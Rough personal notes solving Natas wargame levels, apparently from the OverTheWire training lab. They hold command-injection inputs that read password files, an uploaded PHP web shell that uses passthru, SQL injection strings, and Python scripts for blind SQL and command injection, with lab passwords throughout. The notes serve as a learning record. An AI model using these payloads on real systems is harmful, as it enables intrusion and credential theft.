3 Not even Google will find it this time
http://natas3.natas.labs.overthewire.org/robots.txt
4 tKOcJIbzM4lTs8hbCmzn5Zr4434fGZQm
change refere:
9 command injection
;cat /etc/natas_webpass/natas10
; is to seperate the grep -i command
-
command injection
. /etc/natas_webpass/natas11
nano natas11.php
<? passthru("cat /etc/natas_webpass/natas13");?>curl -u natas12:YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG http://natas12.natas.labs.overthewire.org/ -F “uploadedfile=@natas11.php” -F “filename=natas11.php”
burpsuite:
change jpg to php
nano natas11.php
GIF87a
curl -u natas13:YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG http://natas13.natas.labs.overthewire.org/ -F “uploadedfile=@natas11.php” -F “filename=natas11.php”
burpsuite:
change jpg to php
Content-Disposition: form-data; name=“filename”
rc74vy46dy.php
- sql injection
"+or+1=1#
15 sql injection
username=natas16"+AND+LENGTH(password)>n#
username=natas16"+AND+substr(password,1,1)+like+binary+“%A%”#
BINARY when sql injection is not sensitive to the lowercase and uppercase
n=32
TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V
target = ‘http://natas15.natas.labs.overthewire.org’
charset_1 = “adfgijklqruADEHOPRTVZ23579”
password = “”
while len(password) != 32:
for c in charset_1:
t = password + c
username = (‘natas16" AND password LIKE BINARY "’ + t +‘%" "’)
r = requests.get(target,
auth=(‘natas15’,‘TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB’),
params={“username”: username}
)
if “This user exists” in r.text:
print ('PASS: ’ + t.ljust(32, ‘*’))
password = t
break
16… import requests
from requests.auth import HTTPBasicAuth
auth=HTTPBasicAuth(‘natas16’, ‘TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V’)
filteredchars = ‘’
passwd = ‘’
allchars = ‘abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890’
for char in allchars:
r = requests.get(‘http://natas16.natas.labs.overthewire.org/?needle=doomed$(grep ’ + char + ’ /etc/natas_webpass/natas17)’, auth=auth)
if ‘doomed’ not in r.text:
filteredchars = filteredchars + char
print(filteredchars)
for i in range